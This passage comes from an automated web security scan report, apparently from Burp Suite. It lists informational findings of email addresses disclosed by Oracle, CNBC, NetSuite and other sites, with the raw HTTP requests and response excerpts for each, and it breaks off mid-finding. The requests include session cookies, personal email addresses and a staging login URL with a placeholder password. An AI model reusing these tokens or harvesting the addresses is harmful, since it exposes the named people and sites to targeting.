20DAVID.PEAKE@ORACLE.COM
20KUASSI.MENSAH@ORACLE.COM
ASHLEY.CHEN@ORACLE.COM

Request

GET /otn/feed/entries/atom HTTP/1.1
Host: blogs.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/atom+xml; charset=utf-8
Content-Language: en
X-Oracle-DMS-ECID: 51818405041022743
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51818405041022743,0:1)
Last-Modified: Tue, 06 Sep 2011 15:35:46 GMT
Expires: Tue, 06 Sep 2011 17:06:19 GMT
Date: Tue, 06 Sep 2011 17:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123383

<?xml version="1.0" encoding='utf-8'?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="html">Oracle Technology Network Blog (aka TechBlog)</title>
<subtitle type="html">The world&a
...[SNIP]...
<content type="html"><p>Several titles have been added by our book partners this month.&nbsp; Please take a look at the new titles below and then visit the<a href="ASHLEY.CHEN@ORACLE.COM%20DAVID.PEAKE@ORACLE.COM%20KUASSI.MENSAH@ORACLE.COM%20ALEX.KEH@ORACLE.COM"></a><span style="text-decoration: underline;"> <a href="http://www.oracle.com/technetwork/community/join/member-discounts/index.html">OTN Member Discount
...[SNIP]...

22.7. http://blogs.oracle.com/otn/feed/entries/rss previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.oracle.com
Path:	/otn/feed/entries/rss

Issue detail

The following email addresses were disclosed in the response:

20ALEX.KEH@ORACLE.COM
20DAVID.PEAKE@ORACLE.COM
20KUASSI.MENSAH@ORACLE.COM
ASHLEY.CHEN@ORACLE.COM

Request

GET /otn/feed/entries/rss HTTP/1.1
Host: blogs.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/rss+xml; charset=utf-8
Content-Language: en
X-Oracle-DMS-ECID: 51528267109800496
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=51528267109800496,0:1)
Last-Modified: Tue, 06 Sep 2011 15:35:46 GMT
Expires: Tue, 06 Sep 2011 17:06:19 GMT
Date: Tue, 06 Sep 2011 17:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116022

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom" >
<channel>
<title>Oracle Technology Network Blo
...[SNIP]...
<description><p>Several titles have been added by our book partners this month.&nbsp; Please take a look at the new titles below and then visit the<a href="ASHLEY.CHEN@ORACLE.COM%20DAVID.PEAKE@ORACLE.COM%20KUASSI.MENSAH@ORACLE.COM%20ALEX.KEH@ORACLE.COM"></a><span style="text-decoration: underline;"> <a href="http://www.oracle.com/technetwork/community/join/member-discounts/index.html">OTN Member Discount
...[SNIP]...

22.8. https://dne.oracle.com/pls/uns/OPT_OUT.th previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://dne.oracle.com
Path:	/pls/uns/OPT_OUT.th

Issue detail

The following email address was disclosed in the response:

UNSUBSCRIBE_US@oracle.com

Request

GET /pls/uns/OPT_OUT.th HTTP/1.1
Host: dne.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:33 GMT
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Length: 2648
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>Oracle</title>

</head>
<body bgcolor="#FFFFFF">
<div align="center"><table border="0" width="750" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">

...[SNIP]...
<a href="mailto:UNSUBSCRIBE_US@oracle.com">
...[SNIP]...
<u>UNSUBSCRIBE_US@oracle.com</u>
...[SNIP]...

22.9. http://edge.sapient.com/assets/scripts/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://edge.sapient.com
Path:	/assets/scripts/global.js

Issue detail

The following email address was disclosed in the response:

authorname@sapient.com

Request

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Aug 2011 14:09:36 GMT
Accept-Ranges: bytes
ETag: "010744be75ccc1:27e9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 57424
Cache-Control: max-age=62467
Date: Tue, 06 Sep 2011 15:32:21 GMT
Connection: close

.../*****************************************************************************
scalable Inman Flash Replacement (sIFR) version 3, revision 436.

Copyright 2006 ... 2008 Mark Wubben, <http://nove
...[SNIP]...
<a class="mailIcon" href="mailto:authorname@sapient.com">
...[SNIP]...

22.10. http://education.oracle.com/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/admin/jscripts/rd_temp_config/1001US_rd_temp_config.js

Issue detail

The following email addresses were disclosed in the response:

lvcproducer_us@oracle.com
olntech_us@oracle.com

Request

GET /admin/jscripts/rd_temp_config/1001US_rd_temp_config.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "742b1f-1301e-4e365e61"
Content-Type: application/x-javascript
Last-Modified: Mon, 01 Aug 2011 08:05:53 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=297;ecid=72057811353815560,0)
Content-Length: 77854
Date: Sat, 27 Aug 2011 05:42:18 GMT
Accept-Ranges: bytes

rd_temp_config=new makerd_temp_config();

rd_temp_config.rd_software_downloads="Software Downloads";
rd_temp_config.CERTHeader_Text7="Oracle Practice Tests";
rd_temp_config.CERTHeader_Text6_URL="/glob
...[SNIP]...
<br>";
rd_temp_config.tech_support_sub1_bullet2a="Email:";
rd_temp_config.tech_support_sub1_bullet2b="mailto:olntech_us@oracle.com";
rd_temp_config.tech_support_sub1_bullet2b_url="http://www.oracle.com/us/education/emailus-079096.html";
rd_temp_config.tech_support_sub1_bullet3="Self-Study CD-ROM Support Home<br>
...[SNIP]...
<a href="mailto:lvcproducer_us@oracle.com">lvcproducer_us@oracle.com</a>
...[SNIP]...

22.11. http://education.oracle.com/education/jscripts/JSSerializer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/education/jscripts/JSSerializer.js

Issue detail

The following email address was disclosed in the response:

Matt.Fellows@onegeek.com.au

Request

GET /education/jscripts/JSSerializer.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/searchResult.searchEngineParser
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000; p_org_id=1001; p_lang=US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ETag: "14fa1ed-26a1-4baac79d"
Content-Type: application/x-javascript
Last-Modified: Thu, 25 Mar 2010 02:17:01 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=265;ecid=144115422572057809,0)
Content-Length: 9889
Date: Sat, 03 Sep 2011 05:17:00 GMT
Accept-Ranges: bytes

/*
Copyright 2007 Matt Fellows

Email: Matt.Fellows@onegeek.com.au
Web: http://www.onegeek.com.au

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the F
...[SNIP]...

22.12. http://education.oracle.com/education/jscripts/OUheaderCSS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/education/jscripts/OUheaderCSS.js

Issue detail

The following email address was disclosed in the response:

opnbootcamp_ww@oracle.com

Request

GET /education/jscripts/OUheaderCSS.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "711830-ba55-4e44cc5f"
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Aug 2011 06:46:55 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=162;ecid=72057690790184077,1)
Content-Length: 47701
Date: Sat, 27 Aug 2011 05:40:57 GMT
Accept-Ranges: bytes

var terms_flag = 0;
var complete_url = document.location.href;
var loc = complete_url.lastIndexOf("/");
var html_string = complete_url.substring(loc + 1);
if (html_string == "terms_conditions.htm
...[SNIP]...
<a href="mailto:opnbootcamp_ww@oracle.com" target="_blank">
...[SNIP]...

22.13. http://education.oracle.com/education/jscripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/education/jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /education/jscripts/s_code.js HTTP/1.1
Host: education.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/us/education/selectcountry-new-079003.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342486444; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oracleopenworld%3D%2526pid%253DSearch%25253A%252520OpenWorld%25253A%252520No%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//www.oracle.com/sitemaps/sitemaps.html%2526ot%253DA; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; BIGipServerfapap-education_http_pool=2534249101.24862.0000; p_org_id=1001; p_lang=US

Response

HTTP/1.1 200 OK
ETag: "fc444-755a-4d125392"
Content-Type: application/x-javascript
Last-Modified: Wed, 22 Dec 2010 19:37:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=289;ecid=72057716559994041,1)
Content-Length: 30042
Date: Sat, 27 Aug 2011 05:44:54 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.14. https://education.oracle.com/admin/jscripts/rd_temp_config/_rd_temp_config.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/admin/jscripts/rd_temp_config/_rd_temp_config.js

Issue detail

The following email addresses were disclosed in the response:

lvcproducer_us@oracle.com
olntech_us@oracle.com

Request

GET /admin/jscripts/rd_temp_config/_rd_temp_config.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "1b0ff33-129b2-4c8dd47d"
Content-Type: application/x-javascript
Last-Modified: Mon, 13 Sep 2010 07:36:29 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=0;ecid=144115375057114538,1)
Content-Length: 76210
Date: Sat, 03 Sep 2011 13:15:46 GMT
Accept-Ranges: bytes

rd_temp_config=new makerd_temp_config();

rd_temp_config.rd_software_downloads="Software Downloads";
rd_temp_config.CERTHeader_Text7="Oracle Practice Tests";
rd_temp_config.CERTHeader_Text6_URL="/glob
...[SNIP]...
<br>";
rd_temp_config.tech_support_sub1_bullet2a="Email:";
rd_temp_config.tech_support_sub1_bullet2b="mailto:olntech_us@oracle.com";
rd_temp_config.tech_support_sub1_bullet2b_url="http://www.oracle.com/us/education/emailus-079096.html";
rd_temp_config.tech_support_sub1_bullet3="Self-Study CD-ROM Support Home<br>
...[SNIP]...
<a href="mailto:lvcproducer_us@oracle.com">lvcproducer_us@oracle.com</a>
...[SNIP]...

22.15. https://education.oracle.com/education/jscripts/OUheaderCSS.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/education/jscripts/OUheaderCSS.js

Issue detail

The following email address was disclosed in the response:

opnbootcamp_ww@oracle.com

Request

GET /education/jscripts/OUheaderCSS.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "711830-ba55-4e44cc5f"
Content-Type: application/x-javascript
Last-Modified: Fri, 12 Aug 2011 06:46:55 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (H;max-age=300+0;age=299;ecid=144115379622287656,0)
Content-Length: 47701
Date: Sat, 03 Sep 2011 05:23:01 GMT
Accept-Ranges: bytes

var terms_flag = 0;
var complete_url = document.location.href;
var loc = complete_url.lastIndexOf("/");
var html_string = complete_url.substring(loc + 1);
if (html_string == "terms_conditions.htm
...[SNIP]...
<a href="mailto:opnbootcamp_ww@oracle.com" target="_blank">
...[SNIP]...

22.16. https://education.oracle.com/education/jscripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://education.oracle.com
Path:	/education/jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

GET /education/jscripts/s_code.js HTTP/1.1
Host: education.oracle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://education.oracle.com/pls/web_prod-plq-dad/db_pages.demand_capture?p_wddi_id=&p_org_id=&p_lang=56fe7
Cookie: BIGipServerfapap-education_http_pool=671912589.24862.0000

Response

HTTP/1.1 200 OK
ETag: "fc444-755a-4d125392"
Content-Type: application/x-javascript
Last-Modified: Wed, 22 Dec 2010 19:37:54 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (G;max-age=300+0;age=295;ecid=144115323787714372,0)
Content-Length: 30042
Date: Sat, 03 Sep 2011 05:23:14 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.17. http://event.on24.com/r.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://event.on24.com
Path:	/r.htm

Issue detail

The following email address was disclosed in the response:

jayeshs@on24.com

Request

GET /r.htm HTTP/1.1
Host: event.on24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:40 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 23:44:20 GMT
Accept-Ranges: bytes
Content-Length: 6530
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>

<META HTTP-EQUIV="Content-type" CONTENT="text/html; charset=UTF-8">
<TITLE>Webcasts</TITLE>
<LINK REV="made" href="mailto:jayeshs@on24.com">
...[SNIP]...

22.18. https://forms.netsuite.com/app/site/crm/externalleadpage.nl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.netsuite.com
Path:	/app/site/crm/externalleadpage.nl

Issue detail

The following email address was disclosed in the response:

onlineformuser@NLCORP.com

Request

GET /app/site/crm/externalleadpage.nl?compid=NLCORP&formid=1113&h=540ef1b1bfbd86a9b34e&subsidiary=1&ck=Mhd7aqh5AbdCXidV&vid=Mhd7aqh5AbpCXgSl&cktime=96680&leadsource=g946&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
Referer: https://forms.netsuite.com/app/site/crm/externalleadpage.nl?compid=NLCORP&formid=1113&h=540ef1b1bfbd86a9b34e&subsidiary=1&ck=Mhd7aqh5AbdCXidV&vid=Mhd7aqh5AbpCXgSl&cktime=96680&leadsource=g946
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315341196|session#1315341135013-154927#1315342996|PC#1315341135013-154927.19#1316550738; JSESSIONID=fHTcTm9CBLMJTHFQWbd8qqd81sbXKBcbnK8jsyHgY5NlMPHvvBHKrmGY0yLgRhCZjP6LNPZLjV0XY1NCNpVg6LvVX6517ztFTY6nvnmjQQ7bddV4GnyHHGHM5pCXsFhy!1517314966; NS_VER=2011.2.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:05 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 44621
Expires: 0
NS_RTIMER_COMPOSITE: 668955252:616363742D6A6176613030362E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=986
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Eco
...[SNIP]...
s['customform']='';
window.nsDefaultContextObj={"roleid":"online_form_user","location":"0","department":"0","rolecenter":"CUSTOMER","contact":"0","version":"2011.2","environment":"PRODUCTION","email":"onlineformuser@NLCORP.com","name":"-System-","company":"NLCORP","context":"userinterface","role":"31","subsidiary":"1","user":"-4"};
function addShortcut() {
nlOpenWindow('/core/pages/addShortcut.nl?label='+escape('Container')
...[SNIP]...

...[SNIP]...

22.19. https://forums.oracle.com/forums/themes/english/resources/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forums.oracle.com
Path:	/forums/themes/english/resources/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g
Last-Modified: Tue, 06 Sep 2011 16:00:12 GMT
ETag: "5.5.30-efb6224f9f8ad100cccc06d67aaeea0a-29511"
Content-Type: text/plain
Content-Length: 29511
Date: Tue, 06 Sep 2011 16:13:18 GMT
Connection: keep-alive

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.20. https://login.cnbc.com/cas/js/cnbc_login.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/js/cnbc_login.js

Issue detail

The following email address was disclosed in the response:

guptaashishkumar@gmail.com

Request

GET /cas/js/cnbc_login.js HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:34 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
ETag: W/"2685-1313708448000"
Last-Modified: Thu, 18 Aug 2011 23:00:48 GMT
Content-Length: 2685
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/javascript

function requestActivation(){
   top.location.href = activationURL;
}

function finalSubmit(){
var myForm = document.loginForm;
if(validate(myForm)){
myForm.submit();
}
}

function
...[SNIP]...

       finalSubmit();
   }
   else{
       return true;
   }
   return false;
}

var ckngLogin;
function checkLogin(myForm){
ckngLogin = true;
//https://stage.register.cnbc.com/cas/validateuser?username=guptaashishkumar@gmail.com&password=password
new Ajax.Request("/cas/validateuser", {
method: 'post',
parameters : Form.serialize(myForm),
onSuccess : function(transport){
ckngLogin = false;
var r
...[SNIP]...

22.21. https://myprofile.oracle.com/EndUser/jscripts/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://myprofile.oracle.com
Path:	/EndUser/jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ss.tc

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:08:35 GMT
Accept-Ranges: bytes
Last-Modified: Tue, 06 Jul 2010 23:59:08 GMT
Content-Type: text/html
Content-Language: en
Connection: Keep-Alive
Keep-Alive: timeout=5, max=999
Server: Oracle-Web-Cache-11g/11.1.1.2.0 (H;max-age=300+0;age=40;ecid=30186712057213538,0)
Content-Length: 30025

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

22.22. https://oracleus.wingateweb.com/portal/newreg.ww previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://oracleus.wingateweb.com
Path:	/portal/newreg.ww

Issue detail

The following email address was disclosed in the response:

openworldreg@gpj.com

Request

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:14 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Connection: Keep-Alive
Content-Length: 11209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="expir
...[SNIP]...
<a href="mailto:openworldreg@gpj.com">
...[SNIP]...

22.23. https://register.cnbc.com/forgotPassword1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://register.cnbc.com
